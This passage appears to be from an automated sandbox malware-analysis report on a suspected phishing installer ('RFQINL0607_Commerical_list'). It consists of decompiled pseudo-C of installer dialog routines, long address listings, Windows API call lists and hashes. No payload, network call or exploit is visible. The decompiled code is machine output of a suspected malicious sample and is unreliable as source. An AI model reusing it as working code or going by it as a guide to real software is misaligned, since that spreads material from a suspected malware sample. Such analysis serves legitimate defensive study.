									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x429860; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42e42c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F49(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F49(_v12);
								L91:
								return E00403F7B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


































































                                                                                                                                                                                  0x004048d4
                                                                                                                                                                                  0x004048e5
                                                                                                                                                                                  0x004048ea
                                                                                                                                                                                  0x004048f2
                                                                                                                                                                                  0x004048f8
                                                                                                                                                                                  0x00404900
                                                                                                                                                                                  0x0040490e
                                                                                                                                                                                  0x00404911
                                                                                                                                                                                  0x00404b31
                                                                                                                                                                                  0x00404b38
                                                                                                                                                                                  0x00404b4c
                                                                                                                                                                                  0x00404b3a
                                                                                                                                                                                  0x00404b3c
                                                                                                                                                                                  0x00404b3f
                                                                                                                                                                                  0x00404b40
                                                                                                                                                                                  0x00404b47
                                                                                                                                                                                  0x00404b47
                                                                                                                                                                                  0x00404b58
                                                                                                                                                                                  0x00404b66
                                                                                                                                                                                  0x00404b69
                                                                                                                                                                                  0x00404b7f
                                                                                                                                                                                  0x00404bf4
                                                                                                                                                                                  0x00404bf7
                                                                                                                                                                                  0x00404bf9
                                                                                                                                                                                  0x00404c03
                                                                                                                                                                                  0x00404c11
                                                                                                                                                                                  0x00404c11
                                                                                                                                                                                  0x00404c13
                                                                                                                                                                                  0x00404c1d
                                                                                                                                                                                  0x00404c23
                                                                                                                                                                                  0x00404c26
                                                                                                                                                                                  0x00404c29
                                                                                                                                                                                  0x00404c44
                                                                                                                                                                                  0x00404c2b
                                                                                                                                                                                  0x00404c35
                                                                                                                                                                                  0x00404c35
                                                                                                                                                                                  0x00404c29
                                                                                                                                                                                  0x00404c1d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404bf7
                                                                                                                                                                                  0x00404b84
                                                                                                                                                                                  0x00404b8f
                                                                                                                                                                                  0x00404b94
                                                                                                                                                                                  0x00404b9b
                                                                                                                                                                                  0x00404ba0
                                                                                                                                                                                  0x00404ba4
                                                                                                                                                                                  0x00404baf
                                                                                                                                                                                  0x00404baf
                                                                                                                                                                                  0x00404bb3
                                                                                                                                                                                  0x00404bb7
                                                                                                                                                                                  0x00404bbb
                                                                                                                                                                                  0x00404bce
                                                                                                                                                                                  0x00404bbd
                                                                                                                                                                                  0x00404bbd
                                                                                                                                                                                  0x00404bc4
                                                                                                                                                                                  0x00404bca
                                                                                                                                                                                  0x00404bc6
                                                                                                                                                                                  0x00404bc6
                                                                                                                                                                                  0x00404bc6
                                                                                                                                                                                  0x00404bc4
                                                                                                                                                                                  0x00404bd2
                                                                                                                                                                                  0x00404bd4
                                                                                                                                                                                  0x00404be7
                                                                                                                                                                                  0x00404bea
                                                                                                                                                                                  0x00404bed
                                                                                                                                                                                  0x00404bed
                                                                                                                                                                                  0x00404bb7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404ba4
                                                                                                                                                                                  0x00404b86
                                                                                                                                                                                  0x00404b8d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404c47
                                                                                                                                                                                  0x00404c47
                                                                                                                                                                                  0x00404c4e
                                                                                                                                                                                  0x00404cbf
                                                                                                                                                                                  0x00404cc7
                                                                                                                                                                                  0x00404ccf
                                                                                                                                                                                  0x00404ccf
                                                                                                                                                                                  0x00404cd8
                                                                                                                                                                                  0x00404cda
                                                                                                                                                                                  0x00404ce1
                                                                                                                                                                                  0x00404ce4
                                                                                                                                                                                  0x00404ce4
                                                                                                                                                                                  0x00404cea
                                                                                                                                                                                  0x00404cf1
                                                                                                                                                                                  0x00404cf4
                                                                                                                                                                                  0x00404cf4
                                                                                                                                                                                  0x00404cfa
                                                                                                                                                                                  0x00404d00
                                                                                                                                                                                  0x00404d06
                                                                                                                                                                                  0x00404d06
                                                                                                                                                                                  0x00404d13
                                                                                                                                                                                  0x00404e69
                                                                                                                                                                                  0x00404e70
                                                                                                                                                                                  0x00404e8d
                                                                                                                                                                                  0x00404e93
                                                                                                                                                                                  0x00404ea5
                                                                                                                                                                                  0x00404ea5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404d19
                                                                                                                                                                                  0x00404d1b
                                                                                                                                                                                  0x00404d20
                                                                                                                                                                                  0x00404d25
                                                                                                                                                                                  0x00404d2a
                                                                                                                                                                                  0x00404d2c
                                                                                                                                                                                  0x00404d2c
                                                                                                                                                                                  0x00404d2d
                                                                                                                                                                                  0x00404d2e
                                                                                                                                                                                  0x00404d30
                                                                                                                                                                                  0x00404d30
                                                                                                                                                                                  0x00404d38
                                                                                                                                                                                  0x00404d79
                                                                                                                                                                                  0x00404d7b
                                                                                                                                                                                  0x00404d80
                                                                                                                                                                                  0x00404d8b
                                                                                                                                                                                  0x00404d8e
                                                                                                                                                                                  0x00404d93
                                                                                                                                                                                  0x00404d9a
                                                                                                                                                                                  0x00404d9d
                                                                                                                                                                                  0x00404e3f
                                                                                                                                                                                  0x00404e45
                                                                                                                                                                                  0x00404e4b
                                                                                                                                                                                  0x00404e53
                                                                                                                                                                                  0x00404e64
                                                                                                                                                                                  0x00404e64
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404e53
                                                                                                                                                                                  0x00404da3
                                                                                                                                                                                  0x00404da6
                                                                                                                                                                                  0x00404dac
                                                                                                                                                                                  0x00404db1
                                                                                                                                                                                  0x00404db3
                                                                                                                                                                                  0x00404db5
                                                                                                                                                                                  0x00404dbb
                                                                                                                                                                                  0x00404dc2
                                                                                                                                                                                  0x00404dc7
                                                                                                                                                                                  0x00404dce
                                                                                                                                                                                  0x00404dd1
                                                                                                                                                                                  0x00404dd1
                                                                                                                                                                                  0x00404dd8
                                                                                                                                                                                  0x00404de4
                                                                                                                                                                                  0x00404de8
                                                                                                                                                                                  0x00404dea
                                                                                                                                                                                  0x00404dea
                                                                                                                                                                                  0x00404dda
                                                                                                                                                                                  0x00404ddc
                                                                                                                                                                                  0x00404ddc
                                                                                                                                                                                  0x00404e0a
                                                                                                                                                                                  0x00404e16
                                                                                                                                                                                  0x00404e25
                                                                                                                                                                                  0x00404e25
                                                                                                                                                                                  0x00404e27
                                                                                                                                                                                  0x00404e2a
                                                                                                                                                                                  0x00404e33
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404d3a
                                                                                                                                                                                  0x00404d45
                                                                                                                                                                                  0x00404d48
                                                                                                                                                                                  0x00404d4d
                                                                                                                                                                                  0x00404d4f
                                                                                                                                                                                  0x00404d53
                                                                                                                                                                                  0x00404d63
                                                                                                                                                                                  0x00404d6d
                                                                                                                                                                                  0x00404d6f
                                                                                                                                                                                  0x00404d72
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404d55
                                                                                                                                                                                  0x00404d55
                                                                                                                                                                                  0x00404d5b
                                                                                                                                                                                  0x00404d5d
                                                                                                                                                                                  0x00404d5d
                                                                                                                                                                                  0x00404d5e
                                                                                                                                                                                  0x00404d5f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404d55
                                                                                                                                                                                  0x00404d38
                                                                                                                                                                                  0x00404d13
                                                                                                                                                                                  0x00404c56
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404c6c
                                                                                                                                                                                  0x00404c76
                                                                                                                                                                                  0x00404c7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404c8d
                                                                                                                                                                                  0x00404c92
                                                                                                                                                                                  0x00404c9e
                                                                                                                                                                                  0x00404c9e
                                                                                                                                                                                  0x00404ca0
                                                                                                                                                                                  0x00404caf
                                                                                                                                                                                  0x00404cb1
                                                                                                                                                                                  0x00404cb5
                                                                                                                                                                                  0x00404cb8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404cb8
                                                                                                                                                                                  0x00404c56
                                                                                                                                                                                  0x00404917
                                                                                                                                                                                  0x0040491c
                                                                                                                                                                                  0x00404925
                                                                                                                                                                                  0x0040492c
                                                                                                                                                                                  0x0040493a
                                                                                                                                                                                  0x00404945
                                                                                                                                                                                  0x0040494b
                                                                                                                                                                                  0x00404959
                                                                                                                                                                                  0x0040496d
                                                                                                                                                                                  0x00404972
                                                                                                                                                                                  0x0040497f
                                                                                                                                                                                  0x00404984
                                                                                                                                                                                  0x0040499a
                                                                                                                                                                                  0x004049ab
                                                                                                                                                                                  0x004049b8
                                                                                                                                                                                  0x004049b8
                                                                                                                                                                                  0x004049bb
                                                                                                                                                                                  0x004049c1
                                                                                                                                                                                  0x004049c3
                                                                                                                                                                                  0x004049c6
                                                                                                                                                                                  0x004049cb
                                                                                                                                                                                  0x004049d0
                                                                                                                                                                                  0x004049d2
                                                                                                                                                                                  0x004049d2
                                                                                                                                                                                  0x004049f2
                                                                                                                                                                                  0x004049f2
                                                                                                                                                                                  0x004049f4
                                                                                                                                                                                  0x004049f5
                                                                                                                                                                                  0x004049fa
                                                                                                                                                                                  0x004049fd
                                                                                                                                                                                  0x00404a00
                                                                                                                                                                                  0x00404a04
                                                                                                                                                                                  0x00404a09
                                                                                                                                                                                  0x00404a0e
                                                                                                                                                                                  0x00404a12
                                                                                                                                                                                  0x00404a17
                                                                                                                                                                                  0x00404a1c
                                                                                                                                                                                  0x00404a1e
                                                                                                                                                                                  0x00404a26
                                                                                                                                                                                  0x00404af0
                                                                                                                                                                                  0x00404b03
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404a2c
                                                                                                                                                                                  0x00404a2f
                                                                                                                                                                                  0x00404a32
                                                                                                                                                                                  0x00404a35
                                                                                                                                                                                  0x00404a35
                                                                                                                                                                                  0x00404a3b
                                                                                                                                                                                  0x00404a41
                                                                                                                                                                                  0x00404a44
                                                                                                                                                                                  0x00404a4a
                                                                                                                                                                                  0x00404a4b
                                                                                                                                                                                  0x00404a50
                                                                                                                                                                                  0x00404a59
                                                                                                                                                                                  0x00404a60
                                                                                                                                                                                  0x00404a63
                                                                                                                                                                                  0x00404a66
                                                                                                                                                                                  0x00404a69
                                                                                                                                                                                  0x00404aa5
                                                                                                                                                                                  0x00404ac6
                                                                                                                                                                                  0x00404ac8
                                                                                                                                                                                  0x00404ace
                                                                                                                                                                                  0x00404aa7
                                                                                                                                                                                  0x00404ab4
                                                                                                                                                                                  0x00404ab4
                                                                                                                                                                                  0x00404a6b
                                                                                                                                                                                  0x00404a6e
                                                                                                                                                                                  0x00404a7d
                                                                                                                                                                                  0x00404a87
                                                                                                                                                                                  0x00404a89
                                                                                                                                                                                  0x00404a8f
                                                                                                                                                                                  0x00404a96
                                                                                                                                                                                  0x00404a99
                                                                                                                                                                                  0x00404a9e
                                                                                                                                                                                  0x00404a9e
                                                                                                                                                                                  0x00404a69
                                                                                                                                                                                  0x00404ad4
                                                                                                                                                                                  0x00404ad5
                                                                                                                                                                                  0x00404ae1
                                                                                                                                                                                  0x00404ae1
                                                                                                                                                                                  0x00404aee
                                                                                                                                                                                  0x00404b09
                                                                                                                                                                                  0x00404b0d
                                                                                                                                                                                  0x00404b2a
                                                                                                                                                                                  0x00404b2f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404b0f
                                                                                                                                                                                  0x00404b14
                                                                                                                                                                                  0x00404b1d
                                                                                                                                                                                  0x00404ea7
                                                                                                                                                                                  0x00404eb9
                                                                                                                                                                                  0x00404eb9
                                                                                                                                                                                  0x00404b0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404aee
                                                                                                                                                                                  0x00404a26

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                                                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 00404E45
                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                  • String ID: $M$N
                                                                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                                                                  • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                                                                                  • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                                                                                  • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404352 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                  			E00404352(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x429040; // 0x73b524
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + "7580360";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405509(0x3fb, _t146);
					E00405F9A(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405509(0x3fb, _t146);
							if(E0040588F(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405D2F(0x428838, _t146);
							_t87 = E004060C8("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405D2F(0x428838, _t146);
								_t89 = E0040583A(0x428838);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428838,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x428838) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x428838,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E004057E8(0x428838);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x428838) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E004047E6(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42dbdc; // 0x73cfd8
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E004047CE(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x428828);
									} else {
										E00404709(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42e4a4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403F36(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x429858 - _t158; // 0x0
									if(_t205 == 0) {
										E004042E7();
									}
								}
								 *0x429858 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x429868;
							_v60 = E004046A3;
							_v56 = _t146;
							_v68 = E00405D51(_t146, 0x429868, _t166, 0x428c40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057A1(_t146);
								_t125 =  *((intOrPtr*)( *0x42e410 + 0x11c));
								if( *((intOrPtr*)( *0x42e410 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc") {
									E00405D51(_t146, 0x429868, _t166, 0, _t125);
									if(lstrcmpiA(0x42d3a0, 0x429868) != 0) {
										lstrcatA(_t146, 0x42d3a0);
									}
								}
								 *0x429858 =  *0x429858 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040580E(_t146) != 0 && E0040583A(_t146) == 0) {
						E004057A1(_t146);
					}
					 *0x42dbd8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E00403F14(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F14(_t166);
					E00403F49(_t165);
					_t138 = E004060C8(6);
					if(_t138 == 0) {
						L53:
						return E00403F7B(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, "true");
						goto L8;
					}
				}
			}















































                                                                                                                                                                                  0x00404352
                                                                                                                                                                                  0x00404358
                                                                                                                                                                                  0x0040435e
                                                                                                                                                                                  0x0040436b
                                                                                                                                                                                  0x00404379
                                                                                                                                                                                  0x0040437c
                                                                                                                                                                                  0x00404384
                                                                                                                                                                                  0x0040438a
                                                                                                                                                                                  0x0040438a
                                                                                                                                                                                  0x00404396
                                                                                                                                                                                  0x00404399
                                                                                                                                                                                  0x00404407
                                                                                                                                                                                  0x0040440e
                                                                                                                                                                                  0x004044e5
                                                                                                                                                                                  0x004044ec
                                                                                                                                                                                  0x004044fb
                                                                                                                                                                                  0x004044fb
                                                                                                                                                                                  0x004044ff
                                                                                                                                                                                  0x00404509
                                                                                                                                                                                  0x00404516
                                                                                                                                                                                  0x00404518
                                                                                                                                                                                  0x00404518
                                                                                                                                                                                  0x00404526
                                                                                                                                                                                  0x0040452d
                                                                                                                                                                                  0x00404534
                                                                                                                                                                                  0x00404537
                                                                                                                                                                                  0x0040456e
                                                                                                                                                                                  0x00404570
                                                                                                                                                                                  0x00404576
                                                                                                                                                                                  0x0040457b
                                                                                                                                                                                  0x0040457f
                                                                                                                                                                                  0x00404581
                                                                                                                                                                                  0x00404581
                                                                                                                                                                                  0x0040459d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040459f
                                                                                                                                                                                  0x004045a2
                                                                                                                                                                                  0x004045b0
                                                                                                                                                                                  0x004045b6
                                                                                                                                                                                  0x004045b7
                                                                                                                                                                                  0x004045ba
                                                                                                                                                                                  0x004045bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004045bd
                                                                                                                                                                                  0x00404539
                                                                                                                                                                                  0x0040453b
                                                                                                                                                                                  0x0040453f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404541
                                                                                                                                                                                  0x00404541
                                                                                                                                                                                  0x0040454e
                                                                                                                                                                                  0x00404553
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404557
                                                                                                                                                                                  0x00404559
                                                                                                                                                                                  0x00404559
                                                                                                                                                                                  0x00404561
                                                                                                                                                                                  0x00404563
                                                                                                                                                                                  0x00404566
                                                                                                                                                                                  0x00404569
                                                                                                                                                                                  0x0040456c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040456c
                                                                                                                                                                                  0x004045c9
                                                                                                                                                                                  0x004045d3
                                                                                                                                                                                  0x004045d6
                                                                                                                                                                                  0x004045d9
                                                                                                                                                                                  0x004045e0
                                                                                                                                                                                  0x004045e0
                                                                                                                                                                                  0x004045e2
                                                                                                                                                                                  0x004045e2
                                                                                                                                                                                  0x004045e7
                                                                                                                                                                                  0x004045e9
                                                                                                                                                                                  0x004045f1
                                                                                                                                                                                  0x004045f8
                                                                                                                                                                                  0x004045fa
                                                                                                                                                                                  0x00404605
                                                                                                                                                                                  0x00404605
                                                                                                                                                                                  0x004045fa
                                                                                                                                                                                  0x0040460c
                                                                                                                                                                                  0x00404615
                                                                                                                                                                                  0x0040461f
                                                                                                                                                                                  0x00404627
                                                                                                                                                                                  0x00404642
                                                                                                                                                                                  0x00404629
                                                                                                                                                                                  0x00404632
                                                                                                                                                                                  0x00404632
                                                                                                                                                                                  0x00404627
                                                                                                                                                                                  0x00404647
                                                                                                                                                                                  0x0040464c
                                                                                                                                                                                  0x00404651
                                                                                                                                                                                  0x0040465a
                                                                                                                                                                                  0x0040465a
                                                                                                                                                                                  0x00404663
                                                                                                                                                                                  0x00404665
                                                                                                                                                                                  0x00404665
                                                                                                                                                                                  0x00404671
                                                                                                                                                                                  0x00404679
                                                                                                                                                                                  0x0040467b
                                                                                                                                                                                  0x00404681
                                                                                                                                                                                  0x00404683
                                                                                                                                                                                  0x00404683
                                                                                                                                                                                  0x00404681
                                                                                                                                                                                  0x00404688
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404688
                                                                                                                                                                                  0x00404537
                                                                                                                                                                                  0x004044ee
                                                                                                                                                                                  0x004044f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004044f5
                                                                                                                                                                                  0x00404414
                                                                                                                                                                                  0x0040441d
                                                                                                                                                                                  0x00404437
                                                                                                                                                                                  0x0040443c
                                                                                                                                                                                  0x00404446
                                                                                                                                                                                  0x0040444d
                                                                                                                                                                                  0x00404459
                                                                                                                                                                                  0x0040445c
                                                                                                                                                                                  0x0040445f
                                                                                                                                                                                  0x00404466
                                                                                                                                                                                  0x0040446e
                                                                                                                                                                                  0x00404471
                                                                                                                                                                                  0x00404475
                                                                                                                                                                                  0x0040447c
                                                                                                                                                                                  0x00404484
                                                                                                                                                                                  0x004044de
                                                                                                                                                                                  0x00404486
                                                                                                                                                                                  0x00404487
                                                                                                                                                                                  0x0040448e
                                                                                                                                                                                  0x00404498
                                                                                                                                                                                  0x004044a0
                                                                                                                                                                                  0x004044ad
                                                                                                                                                                                  0x004044c1
                                                                                                                                                                                  0x004044c5
                                                                                                                                                                                  0x004044c5
                                                                                                                                                                                  0x004044c1
                                                                                                                                                                                  0x004044ca
                                                                                                                                                                                  0x004044d7
                                                                                                                                                                                  0x004044d7
                                                                                                                                                                                  0x00404484
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040443c
                                                                                                                                                                                  0x0040442a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404430
                                                                                                                                                                                  0x00404430
                                                                                                                                                                                  0x00000000
